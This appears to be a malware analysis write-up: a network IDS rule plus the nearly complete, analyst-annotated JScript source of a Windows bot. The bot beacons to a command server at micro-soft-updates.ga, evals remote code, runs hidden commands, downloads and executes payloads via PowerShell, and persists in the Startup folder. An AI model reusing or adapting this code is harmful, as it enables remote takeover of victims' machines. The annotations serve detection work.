- alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
- // Analyst annotation of the JScript bot that the Snort rule above is written for.
- // Runs under Windows Script Host (wscript/cscript): the script instantiates two COM
- // automation objects, one for launching processes and one for filesystem checks.
- var shell = new ActiveXObject('WScript.Shell');
- var fstym = new ActiveXObject('Scripting.FileSystemObject');
- // Field separator the C2 response is split on (see the dispatcher below).
- var spl = '|V|';
- // Single backslash; used as the field separator inside the beacon User-Agent string.
- var Ch = '\\';
- // Bot identifier: fixed prefix + volume serial of the first logical disk. The
- // 'xmsSofts_1.0.0_' prefix is exactly what the rule on this page keys on in the
- // User-Agent header, so this constant is the primary network detection hook.
- var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
- // Per-user and all-users Startup folders (persistence locations). StartupAll is
- // declared but not referenced anywhere in this listing.
- var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
- var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
- // Staging directory for downloaded payloads.
- var Temp = getEnv('temp') + '\\';
- // Full path and bare name of the running script; used for self-copy and self-delete.
- var fxDmE4zu = WScript.ScriptFullName;
- var wn = WScript.ScriptName;
- // Declared but never assigned in this listing; it is concatenated into the
- // User-Agent in getUserAgent(), so the beacon presumably carries the literal
- // text "undefined" in that field — verify against a capture.
- var UDex;
- // Seconds to wait between a download finishing and the payload being launched.
- var DeLay = 20;
- // Persistence first: copies this script into the user's Startup folder.
- ModinySks();
- // Main C2 loop: poll, parse, dispatch, sleep 5 s, repeat forever.
- do {
- try {
- // SendHttp is called with no argument, so the POST body is empty; this is
- // consistent with the "Content-Length: 0" match in the rule above.
- var send = SendHttp();
- // Response format: <order>|V|<data>[|V|<filename>]
- var Command = send.split(spl);
- var order = Command[0];
- var order_data = Command[1];
- // 'Ex': server-supplied JScript is evaluated directly — arbitrary code execution
- // with no integrity check on the (plaintext HTTP) channel.
- if (order === 'Ex') {
- eval(order_data);
- }
- // 'Cmd': run an arbitrary command line; window style 0 = hidden, non-blocking.
- if (order === 'Cmd') {
- shell.Run(order_data, 0, false);
- }
- // 'DwnlExe': download Command[1] to %TEMP%\Command[2] via a hidden PowerShell
- // WebClient call, wait DeLay seconds, then launch it. Host-side detection hook:
- // wscript.exe spawning powershell.exe with a DownloadFile argument.
- if (order === 'DwnlExe') {
- var path = Temp + Command[2];
- shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
- WScript.Sleep(DeLay * 1000);
- shell.Run('powershell.exe start ' + path, 0, false);
- }
- // 'SelfRemove': delete the Startup copy and the running script, then exit.
- if (order === 'SelfRemove') {
- shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
- shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
- WScript.Quit(1);
- }
- // 'UpdateS': same download as 'DwnlExe' but waits for it (third argument true);
- // if the file landed, removes both copies of the current script, starts the new
- // file and exits. Note the replacement is launched from %TEMP%, not Startup.
- if (order === 'UpdateS') {
- var path = Temp + Command[2];
- shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
- if (fstym.fileexists(path)) {
- shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
- shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
- WScript.Sleep(DeLay * 1000);
- shell.Run("powershell.exe start '" + path + "'", 0, false);
- WScript.Quit(1);
- }
- }
- } catch (err) {
- // util_log and _inspect are not defined anywhere in this listing; if they are
- // absent at runtime this handler itself throws and the loop terminates.
- util_log('>>> Silencing catch ' + _inspect(err));
- }
- // Beacon interval: 5 seconds.
- WScript.Sleep(5000);
- } while (true);
- // Beacon: synchronous HTTP POST to the C2 endpoint, returning the response body.
- // R is the request body; the only call site in this listing passes nothing.
- // The transport is plaintext HTTP on a non-standard port, which is why the rule
- // above is scoped to !$HTTP_PORTS.
- function SendHttp(R) {
- var X = new ActiveXObject('Microsoft.XMLHTTP');
- X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);
- // Host fingerprint travels in the User-Agent header (see getUserAgent).
- var useragent = getUserAgent();
- // NOTE(review): the header name is given as 'User-Agent:' with a trailing colon.
- // Confirm from a capture how MSXML actually emits this line before relying on
- // the exact "User-Agent|3a| xmsSofts_1.0.0_" byte pattern in the rule above.
- X.SetRequestHeader('User-Agent:', useragent);
- X.send(R);
- return X.responsetext;
- }
- // Builds the host-fingerprint string sent as the User-Agent header.
- // Fields, backslash-separated: bot id, computer name, user name, OS caption with
- // processor address width in brackets, AV product names, NT flag, UDex.
- // A User-Agent containing backslash-separated fields like this is itself an
- // anomaly worth alerting on independently of the fixed prefix.
- function getUserAgent() {
- var s, NT, i;
- // NT = whether the .NET Framework 2.0 VB compiler binary exists on the host;
- // what the operator uses this flag for is not visible in this listing.
- if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
- NT = 'YES';
- } else {
- NT = 'NO';
- }
- // jsUcfirst also strips the first backslash from each field so it cannot
- // collide with the Ch separator. UDex is never assigned in this listing.
- s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
- return s;
- }
- // Expands the environment variable named S via WScript.Shell. If the variable
- // is unset, ExpandEnvironmentStrings leaves the '%S%' text as-is.
- function getEnv(S) {
- return shell.ExpandEnvironmentStrings('%' + S + '%');
- }
- // Returns the volume serial number of the first Win32_LogicalDisk instance from
- // WMI; it is used as the per-host identifier appended to the bot id (VN).
- // Returns undefined if the enumeration is empty. The break after return is
- // unreachable.
- function getSerial() {
- var s;
- s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- return it.volumeserialnumber;
- break;
- }
- }
- // Returns the Caption of the first Win32_OperatingSystem instance (the OS name
- // string) via WMI, or undefined if none. The break after return is unreachable.
- function getSystem() {
- var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- return it.Caption;
- break;
- }
- }
- // Despite the name, this returns the AddressWidth of processor 'cpu0' from WMI,
- // i.e. the CPU's 32/64-bit width, not an OS version. It throws if the WMI path
- // cannot be resolved; there is no try/catch around the call site.
- function getOSVer() {
- return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
- }
- // Collects installed AV product display names from the Security Center WMI
- // namespaces (root\securitycenter, then root\securitycenter2) and returns them
- // joined with ' , '. Security Center queries from a script host are a useful
- // host-side telemetry signal for this kind of reconnaissance.
- function getAntiV() {
- var s;
- var finalx = [];
- var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
- try {
- s = GetObject(wmg).InstancesOf('AntiVirusProduct');
- var en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- var it = en.item();
- var str = it.DisplayName;
- finalx.push(str);
- }
- } catch (e) {
- // util_log and _inspect are not defined in this listing.
- util_log('>>> Silencing catch ' + _inspect(e));
- }
- // 'str' is a hoisted var: if the first query threw or returned nothing it is
- // undefined, and undefined !== '' is true, so the second namespace is queried
- // in every case except when the last DisplayName seen was the empty string.
- if (str !== '') {
- wmg = wmg + '2';
- try {
- s = GetObject(wmg).InstancesOf('AntiVirusProduct');
- en = new Enumerator(s);
- for (; !en.atEnd(); en.moveNext()) {
- it = en.item();
- var str = it.DisplayName;
- finalx.push(str);
- }
- } catch (e) {
- util_log('>>> Silencing catch ' + _inspect(e));
- }
- } else {
- // Intentionally empty in the original.
- }
- var finalxsrt = finalx.join(' , ');
- return finalxsrt;
- }
- // Persistence: copies the running script into the per-user Startup folder using
- // a hidden PowerShell Copy-Item, so it relaunches at logon. Called once at start.
- // Detection hooks: wscript.exe spawning powershell.exe, and a file create in
- // the Startup folder whose name matches the running script.
- function ModinySks() {
- try {
- shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
- } catch (err) {
- // util_log and _inspect are not defined in this listing.
- util_log('>>> Silencing catch ' + _inspect(err));
- }
- }
- // Upper-cases the first character of 'string' and removes the first backslash
- // occurrence (String.replace with a string pattern replaces only the first
- // match). Presumably done so field values cannot contain the Ch separator used
- // in getUserAgent. Throws if 'string' is undefined (e.g. getSystem() returned
- // nothing), since charAt is called on it directly.
- function jsUcfirst(string) {
- var strx = string.charAt(0).toUpperCase() + string.slice(1);
- strx = strx.replace('\\', '');
- return strx;
- }